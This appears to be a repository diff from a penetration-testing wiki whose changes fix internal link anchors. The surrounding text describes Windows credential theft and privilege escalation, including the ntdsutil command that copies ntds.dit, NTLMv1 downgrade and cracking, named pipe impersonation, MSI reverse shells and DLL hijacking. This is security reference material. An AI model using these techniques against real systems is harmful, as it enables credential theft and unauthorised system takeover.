- [ ] Interesting [**DPAPI credentials**](windows-local-privilege-escalation/#dpapi)?
- [ ] Passwords of saved [**Wifi networks**](windows-local-privilege-escalation/#wifi)?
- [ ] Interesting info in [**saved RDP Connections**](windows-local-privilege-escalation/#saved-rdp-connections)?
- [ ] Passwords in [**recently run commands**](windows-local-privilege-escalation/#recently-run-commands)?
- [ ] [**Remote Desktop Credentials Manager**](windows-local-privilege-escalation/#remote-desktop-credential-manager) passwords?
- [ ] [**AppCmd.exe** exists](windows-local-privilege-escalation/#appcmd-exe)? Credentials?
- [ ] [**SCClient.exe**](windows-local-privilege-escalation/#scclient-sccm)? DLL Side Loading?
- [ ] [**Winlogon** ](windows-local-privilege-escalation/index.html#winlogon-credentials)credentials
- [ ] [**Windows Vault**](windows-local-privilege-escalation/index.html#credentials-manager-windows-vault) credentials that you could use?
- [ ] Interesting [**DPAPI credentials**](windows-local-privilege-escalation/index.html#dpapi)?
- [ ] Passwords of saved [**Wifi networks**](windows-local-privilege-escalation/index.html#wifi)?
- [ ] Interesting info in [**saved RDP Connections**](windows-local-privilege-escalation/index.html#saved-rdp-connections)?
- [ ] Passwords in [**recently run commands**](windows-local-privilege-escalation/index.html#recently-run-commands)?
- [ ] [**Remote Desktop Credentials Manager**](windows-local-privilege-escalation/index.html#remote-desktop-credential-manager) passwords?
- [ ] [**AppCmd.exe** exists](windows-local-privilege-escalation/index.html#appcmd-exe)? Credentials?
- [ ] [**SCClient.exe**](windows-local-privilege-escalation/index.html#scclient-sccm)? DLL Side Loading?
### [Files and Registry (Credentials)](windows-local-privilege-escalation/#files-and-registry-credentials)
### [Files and Registry (Credentials)](windows-local-privilege-escalation/index.html#files-and-registry-credentials)
- [ ] **Putty:** [**Creds**](windows-local-privilege-escalation/#putty-creds) **and** [**SSH host keys**](windows-local-privilege-escalation/#putty-ssh-host-keys)
- [ ] [**SSH keys in registry**](windows-local-privilege-escalation/#ssh-keys-in-registry)?
- [ ] Passwords in [**unattended files**](windows-local-privilege-escalation/#unattended-files)?
- [ ] Any [**SAM & SYSTEM**](windows-local-privilege-escalation/#sam-and-system-backups) backup?
- [ ] [**Cloud credentials**](windows-local-privilege-escalation/#cloud-credentials)?
- [ ] [**McAfee SiteList.xml**](windows-local-privilege-escalation/#mcafee-sitelist.xml) file?
- [ ] [**Cached GPP Password**](windows-local-privilege-escalation/#cached-gpp-pasword)?
- [ ] Password in [**IIS Web config file**](windows-local-privilege-escalation/#iis-web-config)?
- [ ] Interesting info in [**web** **logs**](windows-local-privilege-escalation/#logs)?
- [ ] Do you want to [**ask for credentials**](windows-local-privilege-escalation/#ask-for-credentials) to the user?
- [ ] Interesting [**files inside the Recycle Bin**](windows-local-privilege-escalation/#credentials-in-the-recyclebin)?
- [ ] Other [**registry containing credentials**](windows-local-privilege-escalation/#inside-the-registry)?
- [ ] Inside [**Browser data**](windows-local-privilege-escalation/#browsers-history) (dbs, history, bookmarks, ...)?
- [ ] [**Generic password search**](windows-local-privilege-escalation/#generic-password-search-in-files-and-registry) in files and registry
- [ ] [**Tools**](windows-local-privilege-escalation/#tools-that-search-for-passwords) to automatically search for passwords
- [ ] **Putty:** [**Creds**](windows-local-privilege-escalation/index.html#putty-creds) **and** [**SSH host keys**](windows-local-privilege-escalation/index.html#putty-ssh-host-keys)
- [ ] [**SSH keys in registry**](windows-local-privilege-escalation/index.html#ssh-keys-in-registry)?
- [ ] Passwords in [**unattended files**](windows-local-privilege-escalation/index.html#unattended-files)?
- [ ] Any [**SAM & SYSTEM**](windows-local-privilege-escalation/index.html#sam-and-system-backups) backup?
- [ ] [**Cloud credentials**](windows-local-privilege-escalation/index.html#cloud-credentials)?
- [ ] [**McAfee SiteList.xml**](windows-local-privilege-escalation/index.html#mcafee-sitelist.xml) file?
- [ ] [**Cached GPP Password**](windows-local-privilege-escalation/index.html#cached-gpp-pasword)?
- [ ] Password in [**IIS Web config file**](windows-local-privilege-escalation/index.html#iis-web-config)?
- [ ] Interesting info in [**web** **logs**](windows-local-privilege-escalation/index.html#logs)?
- [ ] Do you want to [**ask for credentials**](windows-local-privilege-escalation/index.html#ask-for-credentials) to the user?
- [ ] Interesting [**files inside the Recycle Bin**](windows-local-privilege-escalation/index.html#credentials-in-the-recyclebin)?
- [ ] Other [**registry containing credentials**](windows-local-privilege-escalation/index.html#inside-the-registry)?
- [ ] Inside [**Browser data**](windows-local-privilege-escalation/index.html#browsers-history) (dbs, history, bookmarks, ...)?
- [ ] [**Generic password search**](windows-local-privilege-escalation/index.html#generic-password-search-in-files-and-registry) in files and registry
- [ ] [**Tools**](windows-local-privilege-escalation/index.html#tools-that-search-for-passwords) to automatically search for passwords
### [Leaked Handlers](windows-local-privilege-escalation/#leaked-handlers)
### [Leaked Handlers](windows-local-privilege-escalation/index.html#leaked-handlers)
- [ ] Have you access to any handler of a process run by administrator?
### [Pipe Client Impersonation](windows-local-privilege-escalation/#named-pipe-client-impersonation)
### [Pipe Client Impersonation](windows-local-privilege-escalation/index.html#named-pipe-client-impersonation)
- [ ] Check if you can abuse it

2
src/windows-hardening/ntlm/README.md
View File

@ -85,7 +85,7 @@ You could abuse some credentials/sessions you already have on the AD to **ask th
If you are using `responder` you could try to \*\*use the flag `--lm` \*\* to try to **downgrade** the **authentication**.\
&#xNAN;_&#x4E;ote that for this technique the authentication must be performed using NTLMv1 (NTLMv2 is not valid)._
Remember that the printer will use the computer account during the authentication, and computer accounts use **long and random passwords** that you **probably won't be able to crack** using common **dictionaries**. But the **NTLMv1** authentication **uses DES** ([more info here](./#ntlmv1-challenge)), so using some services specially dedicated to cracking DES you will be able to crack it (you could use [https://crack.sh/](https://crack.sh) or [https://ntlmv1.com/](https://ntlmv1.com) for example).
Remember that the printer will use the computer account during the authentication, and computer accounts use **long and random passwords** that you **probably won't be able to crack** using common **dictionaries**. But the **NTLMv1** authentication **uses DES** ([more info here](#ntlmv1-challenge)), so using some services specially dedicated to cracking DES you will be able to crack it (you could use [https://crack.sh/](https://crack.sh) or [https://ntlmv1.com/](https://ntlmv1.com) for example).
### NTLMv1 attack with hashcat

2
src/windows-hardening/stealing-credentials/README.md
View File

@ -250,7 +250,7 @@ Available since Windows Server 2008.
ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit
```
You could also use the [**volume shadow copy**](./#stealing-sam-and-system) trick to copy the **ntds.dit** file. Remember that you will also need a copy of the **SYSTEM file** (again, [**dump it from the registry or use the volume shadow copy**](./#stealing-sam-and-system) trick).
You could also use the [**volume shadow copy**](#stealing-sam-and-system) trick to copy the **ntds.dit** file. Remember that you will also need a copy of the **SYSTEM file** (again, [**dump it from the registry or use the volume shadow copy**](#stealing-sam-and-system) trick).
### **Extracting hashes from NTDS.dit**

8
src/windows-hardening/windows-local-privilege-escalation/README.md
View File

@ -375,7 +375,7 @@ If you **belongs to some privileged group you may be able to escalate privileges
### Token manipulation
**Learn more** about what is a **token** in this page: [**Windows Tokens**](../authentication-credentials-uac-and-efs/#access-tokens).\
**Learn more** about what is a **token** in this page: [**Windows Tokens**](../authentication-credentials-uac-and-efs/index.html#access-tokens).\
Check the following page to **learn about interesting tokens** and how to abuse them:
{{#ref}}
@ -1415,7 +1415,7 @@ Shared memory segments, referred to as **pipes**, enable process communication a
Windows provides a feature called **Named Pipes**, allowing unrelated processes to share data, even over different networks. This resembles a client/server architecture, with roles defined as **named pipe server** and **named pipe client**.
When data is sent through a pipe by a **client**, the **server** that set up the pipe has the ability to **take on the identity** of the **client**, assuming it has the necessary **SeImpersonate** rights. Identifying a **privileged process** that communicates via a pipe you can mimic provides an opportunity to **gain higher privileges** by adopting the identity of that process once it interacts with the pipe you established. For instructions on executing such an attack, helpful guides can be found [**here**](named-pipe-client-impersonation.md) and [**here**](./#from-high-integrity-to-system).
When data is sent through a pipe by a **client**, the **server** that set up the pipe has the ability to **take on the identity** of the **client**, assuming it has the necessary **SeImpersonate** rights. Identifying a **privileged process** that communicates via a pipe you can mimic provides an opportunity to **gain higher privileges** by adopting the identity of that process once it interacts with the pipe you established. For instructions on executing such an attack, helpful guides can be found [**here**](named-pipe-client-impersonation.md) and [**here**](#from-high-integrity-to-system).
Also the following tool allows to **intercept a named pipe communication with a tool like burp:** [**https://github.com/gabriel-sztejnworcel/pipe-intercept**](https://github.com/gabriel-sztejnworcel/pipe-intercept) **and this tool allows to list and see all the pipes to find privescs** [**https://github.com/cyberark/PipeViewer**](https://github.com/cyberark/PipeViewer)
@ -1519,7 +1519,7 @@ sc start newservicename
### AlwaysInstallElevated
From a High Integrity process you could try to **enable the AlwaysInstallElevated registry entries** and **install** a reverse shell using a _**.msi**_ wrapper.\
[More information about the registry keys involved and how to install a _.msi_ package here.](./#alwaysinstallelevated)
[More information about the registry keys involved and how to install a _.msi_ package here.](#alwaysinstallelevated)
### High + SeImpersonate privilege to System
@ -1534,7 +1534,7 @@ Using this technique is usually **selected any process running as SYSTEM with al
### **Named Pipes**
This technique is used by meterpreter to escalate in `getsystem`. The technique consists on **creating a pipe and then create/abuse a service to write on that pipe**. Then, the **server** that created the pipe using the **`SeImpersonate`** privilege will be able to **impersonate the token** of the pipe client (the service) obtaining SYSTEM privileges.\
If you want to [**learn more about name pipes you should read this**](./#named-pipe-client-impersonation).\
If you want to [**learn more about name pipes you should read this**](#named-pipe-client-impersonation).\
If you want to read an example of [**how to go from high integrity to System using name pipes you should read this**](from-high-integrity-to-system-with-name-pipes.md).
### Dll Hijacking

2
src/windows-hardening/windows-local-privilege-escalation/access-tokens.md
View File

@ -59,7 +59,7 @@ or using _Process Explorer_ from Sysinternals (select process and access"Securit
### Local administrator
When a local administrator logins, **two access tokens are created**: One with admin rights and other one with normal rights. **By default**, when this user executes a process the one with **regular** (non-administrator) **rights is used**. When this user tries to **execute** anything **as administrator** ("Run as Administrator" for example) the **UAC** will be used to ask for permission.\
If you want to [**learn more about the UAC read this page**](../authentication-credentials-uac-and-efs/#uac)**.**
If you want to [**learn more about the UAC read this page**](../authentication-credentials-uac-and-efs/index.html#uac)**.**
### Credentials user impersonation

2
src/windows-hardening/windows-local-privilege-escalation/create-msi-with-wix.md
View File

@ -6,7 +6,7 @@ The creation of the MSI installer will be done using wixtools, specifically [wix
For a comprehensive understanding of wix MSI usage examples, it is advisable to consult [this page](https://www.codeproject.com/Tips/105638/A-quick-introduction-Create-an-MSI-installer-with). Here, you can find various examples that demonstrate the usage of wix MSI.
The aim is to generate an MSI that will execute the lnk file. In order to achieve this, the following XML code could be employed ([xml from here](https://0xrick.github.io/hack-the-box/ethereal/#Creating-Malicious-msi-and-getting-root)):
The aim is to generate an MSI that will execute the lnk file. In order to achieve this, the following XML code could be employed ([xml from here](https://0xrick.github.io/hack-the-box/ethereal/index.html#Creating-Malicious-msi-and-getting-root)):
```markup
<?xml version="1.0"?>

2
src/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md
View File

@ -113,7 +113,7 @@ Other interesting automated tools to discover this vulnerability are **PowerSplo
### Example
In case you find an exploitable scenario one of the most important things to successfully exploit it would be to **create a dll that exports at least all the functions the executable will import from it**. Anyway, note that Dll Hijacking comes handy in order to [escalate from Medium Integrity level to High **(bypassing UAC)**](../authentication-credentials-uac-and-efs.md#uac) or from[ **High Integrity to SYSTEM**](./#from-high-integrity-to-system)**.** You can find an example of **how to create a valid dll** inside this dll hijacking study focused on dll hijacking for execution: [**https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows**](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows)**.**\
In case you find an exploitable scenario one of the most important things to successfully exploit it would be to **create a dll that exports at least all the functions the executable will import from it**. Anyway, note that Dll Hijacking comes handy in order to [escalate from Medium Integrity level to High **(bypassing UAC)**](../authentication-credentials-uac-and-efs.md#uac) or from[ **High Integrity to SYSTEM**](#from-high-integrity-to-system)**.** You can find an example of **how to create a valid dll** inside this dll hijacking study focused on dll hijacking for execution: [**https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows**](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows)**.**\
Moreover, in the **next sectio**n you can find some **basic dll codes** that might be useful as **templates** or to create a **dll with non required functions exported**.
## **Creating and compiling Dlls**

2
src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
View File

@ -112,7 +112,7 @@ Other interesting automated tools to discover this vulnerability are **PowerSplo
### Example
In case you find an exploitable scenario one of the most important things to successfully exploit it would be to **create a dll that exports at least all the functions the executable will import from it**. Anyway, note that Dll Hijacking comes handy in order to [escalate from Medium Integrity level to High **(bypassing UAC)**](../../authentication-credentials-uac-and-efs/#uac) or from[ **High Integrity to SYSTEM**](../#from-high-integrity-to-system)**.** You can find an example of **how to create a valid dll** inside this dll hijacking study focused on dll hijacking for execution: [**https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows**](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows)**.**\
In case you find an exploitable scenario one of the most important things to successfully exploit it would be to **create a dll that exports at least all the functions the executable will import from it**. Anyway, note that Dll Hijacking comes handy in order to [escalate from Medium Integrity level to High **(bypassing UAC)**](../../authentication-credentials-uac-and-efs/index.html#uac) or from[ **High Integrity to SYSTEM**](../index.html#from-high-integrity-to-system)**.** You can find an example of **how to create a valid dll** inside this dll hijacking study focused on dll hijacking for execution: [**https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows**](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows)**.**\
Moreover, in the **next sectio**n you can find some **basic dll codes** that might be useful as **templates** or to create a **dll with non required functions exported**.
## **Creating and compiling Dlls**

2
src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
View File

@ -69,7 +69,7 @@ After finding this, I found this interesting blog post that also explains how to
So, to **escalate privileges** we are going to hijack the library **WptsExtensions.dll**. Having the **path** and the **name** we just need to **generate the malicious dll**.
You can [**try to use any of these examples**](./#creating-and-compiling-dlls). You could run payloads such as: get a rev shell, add a user, execute a beacon...
You can [**try to use any of these examples**](#creating-and-compiling-dlls). You could run payloads such as: get a rev shell, add a user, execute a beacon...
> [!WARNING]
> Note that **not all the service are run** with **`NT AUTHORITY\SYSTEM`** some are also run with **`NT AUTHORITY\LOCAL SERVICE`** which has **less privileges** and you **won't be able to create a new user** abuse its permissions.\